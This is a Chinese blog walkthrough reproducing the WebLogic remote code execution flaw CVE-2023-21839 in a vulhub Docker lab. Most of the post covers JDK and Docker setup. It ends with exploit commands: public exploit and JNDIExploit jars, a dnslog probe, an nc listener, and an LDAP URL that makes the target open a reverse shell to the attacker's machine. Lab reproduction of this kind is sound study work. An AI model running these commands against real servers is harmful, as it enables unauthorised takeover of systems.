复现CVE-2023-21839

最新推荐文章于 2023-12-23 15:57:34 发布
最新推荐文章于 2023-12-23 15:57:34 发布
阅读量1.8k 收藏
点赞数
分类专栏: 漏洞挖掘 文章标签: linux ubuntu java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44223394/article/details/130462593
版权

攻击机安装jdk1.8

下载jdk1.8
https://www.azul.com/downloads/?version=java-8-lts&os=ubuntu&architecture=x86-64-bit&package=jdk#zulu

wget https://cdn.azul.com/zulu/bin/zulu8.60.0.21-ca-jdk8.0.372-linux_x64.tar.gz

tar -zxvf zulu8.60.0.21-ca-jdk8.0.372-linux_x64.tar.gz
#创建java文件夹
mkdir -p /usr/local/java
#解压后更改文件夹名字为 jdk1.8.0.372
mv zulu8.60.0.21-ca-jdk8.0.372-linux_x64 jdk1.8.0.372
#将文件夹移动到/usr/local/java目录下
mv jdk1.8.0.372 /usr/local/java

vim /etc/environment

PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games"
export JAVA_HOME=/usr/local/java/jdk1.8.0.372
export JRE_HOME=/usr/local/java/jdk1.8.0.372/jre
export CLASSPATH=$CLASSPATH:$JAVA_HOME/lib:$JAVA_HOME/jre/lib

vim /etc/profile

export JAVA_HOME=/usr/local/java/jdk1.8.0.372
export JRE_HOME=/usr/local/java/jdk1.8.0.372/jre
export CLASSPATH=$CLASSPATH:$JAVA_HOME/lib:$JAVA_HOME/jre/lib
export PATH=$JAVA_HOME/bin:$JAVA_HOME/jre/bin:$PATH:$HOME/

source /etc/profile

gedit ~/.bashrc

export JAVA_HOME=/usr/local/java/jdk1.8.0.372
export CLASSPATH=.:/usr/local/java/jdk1.8.0.372/lib
export PATH=$PATH:$JAVA_HOME/bin

source ~/.bashrc

chmod 777 /usr/local/java/jdk1.8.0.372/bin/java
chmod 777 /usr/local/java/jdk1.8.0.372/bin/javac
chmod 777 /usr/local/java/jdk1.8.0.372/bin/javadoc
chmod 777 /usr/local/java/jdk1.8.0.372/bin/javap

sudo update-alternatives --install /usr/bin/java java /usr/local/java/jdk1.8.0.372/bin/java 300
sudo update-alternatives --install /usr/bin/javac javac /usr/local/java/jdk1.8.0.372/bin/javac 300
sudo update-alternatives --install /usr/bin/javap javap /usr/local/java/jdk1.8.0.372/bin/javap 300
sudo update-alternatives --install /usr/bin/javadoc javadoc /usr/local/java/jdk1.8.0.372/bin/javadoc 300

验证是否安装成功
java -version
javac
如有提示,安装完成。

安装docker

vim /etc/apt/sources.list

#中科大
    deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
    deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云
    deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
    deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#清华大学
    #deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
    #deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

apt-get update && apt-get upgrade && apt-get dist-upgrade

apt-get clean

apt-get install docker docker-compose
#验证是否安装成功
docker -v

#启动docker服务
service docker start

#设置docker开机自启
systemctl enable docker

docker相关命令

#查看漏洞环境
docker ps
#进入容器id交互,退出交互用exit
docker exec -it 容器id /bin/bash
#停止容器环境
docker stop 容器id  
#关闭漏洞环境
docker-compose down

搭建vulhub环境

cd /home/
git clone https://github.com/vulhub/vulhub.git
cd ./vulhub/weblogic/CVE-2023-21839
#编译(有的需要编译,有的不需要,这个漏洞不需要,则不需要执行)
sudo docker-compose build
#启动漏洞环境
docker-compose up -d
等待下载完成,环境搭建起来后
靶机上访问:http://127.0.0.1:7001/console/login/LoginForm.jsp
或查看靶机的ip:ifconfig
攻击机上访问:http://靶机的ip:7001/console/login/LoginForm.jsp

复现

两台虚拟机均是NAT连接模式。
我这里ip如下:
靶机ip :192.168.78.129
攻击机ip:192.168.78.128

下载Weblogic-CVE-2023-21839的jar包
https://github.com/DXask88MA/Weblogic-CVE-2023-21839

下载JNDIExploit的jar包
https://github.com/WhiteHSBG/JNDIExploit

在线生成dnslog:http://dnslog.cn/

攻击机:
java -jar Weblogic-CVE-2023-21839.jar 192.168.78.129:7001 ldap://xxxxx.dnslog.cn
若有dnslog网站上显示记录生成,则可以出网。

攻击机搭建ldap服务:
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.78.128
攻击机上设置端口监听
nc -lvnp 8888

攻击机:
java -jar Weblogic-CVE-2023-21839.jar 192.168.78.129:7001 ldap://192.168.78.128:1389/Basic/ReverseShell/192.168.78.128/8888

至此,复现漏洞完成。

效果

在这里插入图片描述

wh0am1·
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2023-21839:Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 3889
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2023-21839漏洞复现(基于vulhub)
weixin_63960760的博客
09-11 847
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
【漏洞复现】Weblogic CVE-2023-21839
zg_111的博客
03-23 6462
Weblogic CVE-2023-21839漏洞复现
Weblogic远程代码执行漏洞(CVE-2023-21839)复现
最新发布
yunshang_secure的博客
12-23 2045
复现过程中,会出现各种各样报错,小伙伴多找网上文章解决,本文仅作参考。
JNDIExploit-1.4-SNAPSHOT.jar
01-10
编译后的JNDIExploit-1.4-SNAPSHOT.jar,可以直接用,1.4版本支持tomcatBypass路由直接上线msf。
【高危】WebLogic Server 远程代码执行漏洞复现及攻击拦截 (CVE-2023-21839)
xsharkrasp的博客
05-18 580
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的未授权访问或直接获取WebLogic服务器权限。当远程对象继承自OpaqueReference时,客户端在对该对象进行JNDI查找并获取的时候,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的实际引用。发起攻击请求:新建/tmp/1.txt文件。
CVE-2023-25157-main(1).zip
07-19
总而言之,CVE-2023-25157是一个涉及GeoServer的SQL注入漏洞,通过复现该漏洞,我们可以更好地理解其风险,并采取必要的措施来保护我们的系统。提供的压缩包文件包含的信息将有助于这一过程,对于学习安全防护和提升...
cve-2023-1454
04-24
漏洞描述: JeecgBoot是一款基于代码生成器的低代码开发平台。 企业Web应用程序的Java低代码平台JEECG-Boot(v3.5.0)最新未经授权的SQL注入。 影响范围: 攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息...
CVE-2023-32315-Openfire-Bypass-main.zip
07-17
复现 CVE-2023-32315 的过程包括以下步骤: 1. **环境准备**:设置一个运行 Openfire 的测试环境,确保版本包含该漏洞。 2. **漏洞分析**:研究 Openfire 的源代码,定位与认证相关的函数和模块,寻找可能的绕过...
JNDIExploit-1.2-SNAPSHOT
03-20
JNDIExploit-1.2-SNAPSHOT
JNDIExploit.zip
12-14
JNDIExploit
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
0xSec
02-11 5331
WebLogic存在远程代码执行漏洞,该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏易受攻击的WebLogic服务器,成功利用此漏洞可能导致Oracle WebLogic服务器被接管或敏感信息泄露。
CVE-2023-21839远程代码执行漏洞
刘家华(游戏开发)
05-01 1543
weblogic CVE-2023-21839CVE-2023-21931、CVE-2023-21979远程代码执行漏洞复现
CVE-2023-22809复现(Rot5pider安全团队)
weixin_52763014的博客
04-08 2709
复现过程中,遇到了编辑器的版本问题,vim 8.0 没办法使用那条攻击命令报错是说vim不能使用--参数,但是换了一个环境的ubuntu下的vim8.1就可以执行,具体问题不是很清楚,可以多试试。具体格式就是: xxx ALL=(ALL:ALL) sudoedit /etc/xxx 其中第一个xxx是你要进行提权的普通用户的用户名,第二是etc下的一个随意文件(这里具体哪些能行哪些不能行,我也不知道,我测试的vim和xml都可以执行,多试试)保存退出,然后 su xxx切换到用户中。
漏洞实现 --- Vm2沙箱逃逸漏洞复现(CVE-2023-32314)
weixin_62443409的博客
09-13 4930
安装低版本npm是为了规避npm的内部审核机制(高版本npm会检查vm2安装包的安全性)CentOS7(Nodejs和vm@3.9.17)升级nodejs至高版本。
CVE-2023-21839
08-17
- *1* *3* [CVE-2023-21839:Weblogic反序列化漏洞复现](https://blog.csdn.net/weixin_48539059/article/details/130101435)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值